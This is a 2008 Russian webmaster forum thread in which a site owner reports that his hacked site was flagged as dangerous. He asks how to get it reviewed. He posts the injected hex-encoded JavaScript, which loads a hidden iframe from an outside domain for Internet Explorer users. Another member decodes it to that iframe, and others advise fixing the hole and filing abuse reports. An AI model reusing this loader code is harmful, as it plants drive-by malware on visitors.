АРМАДА
заблокировали сайт
На страницу 1, 2  След.
Новая тема Написать ответ Advanced Hosters - профессиональный хостинг

Xruman
Гуру
Зарегистрирован: 05.08.2008
Сообщений: 1208
Обратиться по нику
# Добавлено:Чт Ноя 06, 2008 11:21 amДобавить в избранноеОтветить с цитатой
Сломали сидж, прописали троя и домен мой заблокировали. Когда захожу на сайт пишут что типа "Имеется информация, что этот сайт атакует компьютеры! бла-бла-бла" Отписался там в обратной форме что справился с проблемой. Сколько примерно они буду рассматривать эту заявку? кто сталкивался?


Последний раз редактировалось: Xruman (Чт Ноя 06, 2008 4:24 pm), всего редактировалось 1 раз

Rabbit
Кролики - это не только ценный мех
Зарегистрирован: 01.08.2005
Сообщений: 19787
Star (Сумма: 1)
Обратиться по нику
# Добавлено:Чт Ноя 06, 2008 12:46 pmОтветить с цитатой
Gidz, а кто регистратор домена?
Новое. Прибыльное. Скоро!

Xruman
Гуру
Зарегистрирован: 05.08.2008
Сообщений: 1208
Обратиться по нику
# Добавлено:Чт Ноя 06, 2008 12:49 pmОтветить с цитатой
domains.webmoney.ru

Li-Hua
Чинамэн
Зарегистрирован: 25.12.2005
Сообщений: 11544
Обратиться по нику
# Добавлено:Чт Ноя 06, 2008 12:54 pmОтветить с цитатой
Сорри но как тебя угораздило домен под сидж там купить? Сколько займет по времени решение у них думаю никто не скажет.

adamant
V.I.P.
Зарегистрирован: 20.03.2008
Сообщений: 11494
Обратиться по нику
# Добавлено:Чт Ноя 06, 2008 1:18 pmОтветить с цитатой
[offtop]какого троя рассылал?[/offtop]
EvaPharmacy. Чтобы мазать хлеб икоркой, Ева – лучшая партнёрка! Инвайты Jabber: evasupport@jabber.org и ICQ: 750000
Unlimited on 1Gbs port |

Xruman
Гуру
Зарегистрирован: 05.08.2008
Сообщений: 1208
Обратиться по нику
# Добавлено:Чт Ноя 06, 2008 2:34 pmОтветить с цитатой
ну я незнаю, мож это не трой, как там правильно он назыается - експлоит? в теле короче такая хрень прописалась

Код:
<script> var s='3C696672616D65207372633D22687474703A2F2F7777772E63656C6562726974796E796D70686F2E6
36F6D2F73742F6E69636865732F7A2F7374617469632E70687022206865696768743D223222207374796
C653D22646973706C61793A6E6F6E65222077696474683D2232223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} var v=navigator.userAgent.toLowerCase(); if (v.indexOf('msie') != -1 && v.indexOf('nt 6.') == -1){document.write(unescape(o));}</script>



админ сервера сказал что эпидемия целая пошла... Sad и я уже не первый за эти пару дней.

По поводу домена сори не то написал... домен работает... сайт работает... просто в мозиле если просматривать сайт(с включенной галкой "Информировать, не подозревается ли сайт в атаках на компьютеры" в настройках), то выводится гугливское предупреждение, что этот сайт опасен для просмотра, где можно перейти по ссылке Ask StopBadware to review your site и заполнить форму для разблокировки.

Rabbit
Кролики - это не только ценный мех
Зарегистрирован: 01.08.2005
Сообщений: 19787
Star (Сумма: 1)
Обратиться по нику
# Добавлено:Чт Ноя 06, 2008 5:06 pmОтветить с цитатой
Gidz, так может не все вредоносное просто с сайта удалил? Раз браузер предупреждает?
Новое. Прибыльное. Скоро!

hymen
Опытный
Зарегистрирован: 17.02.2008
Сообщений: 411
Обратиться по нику
# Добавлено:Чт Ноя 06, 2008 8:23 pmОтветить с цитатой
Согласна с Rabbit - посмотри инфреймовский код
Нужно раскрутить сайт? У Вас есть средства, но нет времени? Тогда стучим в приват! Только ру зона

mp3skyline + +
Banned
Зарегистрирован: 11.07.2007
Сообщений: 76
Обратиться по нику
# Добавлено:Чт Ноя 06, 2008 9:38 pmОтветить с цитатой
Rabbit писал(а):
Gidz, так может не все вредоносное просто с сайта удалил? Раз браузер предупреждает?



когда лиса выписывает банан домену за гадости, надо сильно помучаться, чтобы из него выйти. автоматом ничего не будет, надо им писать что "дяденьки, я исправился и больше так не буду" r5

pepper
Опытный
Зарегистрирован: 10.04.2008
Сообщений: 184
Обратиться по нику
# Добавлено:Чт Ноя 06, 2008 10:05 pmОтветить с цитатой
Gidz писал(а):

Код:
<script> var s='3C696672616D65207372633D22687474703A2F2F7777772E63656C6562726974796E796D70686F2E6
36F6D2F73742F6E69636865732F7A2F7374617469632E70687022206865696768743D223222207374796
C653D22646973706C61793A6E6F6E65222077696474683D2232223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} var v=navigator.userAgent.toLowerCase(); if (v.indexOf('msie') != -1 && v.indexOf('nt 6.') == -1){document.write(unescape(o));}</script>




Код:
<iframe src="http://www.celebritynympho.com/st/niches/z/static.php" height="2" style="display:none" width="2"></iframe>


Можешь попробовать написать абузу.

pix
Свой
Зарегистрирован: 02.08.2007
Сообщений: 49
Обратиться по нику
# Добавлено:Чт Ноя 06, 2008 10:09 pmОтветить с цитатой
Сайт, а не домен был взломан, это первое, на что следует обратить внимание.
Следует узнать через какую дыру взломали и залатать её.
То есть, убедиться что все будЭ ок.

Далее пишем им, так и так, мой сайт чист, прошу пересмотреть и так далее.
У них есть хороший фак
http://www.stopbadware.org/home/faq
Да, да на Инглише читать, писать, а фигли ))

Ждём +/- 2 недели и радуемся.
Ёще моих мыслей пачка

Xruman
Гуру
Зарегистрирован: 05.08.2008
Сообщений: 1208
Обратиться по нику
# Добавлено:Пт Ноя 07, 2008 9:59 amОтветить с цитатой
эххх... за 2 недели сидж умрет Sad

pepper писал(а):
Gidz писал(а):

Код:
<iframe src="http://www.celebritynympho.com/st/niches/z/static.php" height="2" style="display:none" width="2"></iframe>


Можешь попробовать написать абузу.




несовсем понял откуда ты это взял и что с этим делать. можно поподробней? Smile

Hello_Kitty
V.I.P.
Зарегистрирован: 30.04.2007
Сообщений: 10763
Обратиться по нику
# Добавлено:Пт Ноя 07, 2008 12:23 pmОтветить с цитатой
они в таких случаях умирают уже за пару дней. сдуваются на ноль. :`(

pix
Свой
Зарегистрирован: 02.08.2007
Сообщений: 49
Обратиться по нику
# Добавлено:Пт Ноя 07, 2008 6:41 pmОтветить с цитатой
Gidz писал(а):
эххх... за 2 недели сидж умрет Sad


R.I.P.
риск ёпта ))
Делай СДЛ))

Gidz писал(а):

несовсем понял откуда ты это взял и что с этим делать. можно поподробней? Smile


Человек раскодировал яву, которая была втюхнута тебе в сидж.
Раскодировав её, сразу видно хто "злодей", аха.

Абузы писать:
— регистратору домена
— хостеру, у которого висит "злодей".
Удачи.

pepper
Опытный
Зарегистрирован: 10.04.2008
Сообщений: 184
Обратиться по нику
# Добавлено:Пт Ноя 07, 2008 8:35 pmОтветить с цитатой
Gidz писал(а):

несовсем понял откуда ты это взял и что с этим делать. можно поподробней? Smile


Как правильно заметил pix, это раскодированный javascript-код, который ты привел. Соответсвенно он преобразуется в
Код:
<iframe src="http://www.celebritynympho.com/st/niches/z/static.php" height="2" style="display:none" width="2"></iframe>


Т.е. на твоем сидже грузится во фрейме celebritynympho.com. А что там дальше уже не узнать: автор потер пути на сайте.
Новая тема Написать ответ    ГЛАВНАЯ ~ ТЕХНИЧЕСКИЕ ВОПРОСЫ

Перейти:  





Генеральный спонсор



Партнеры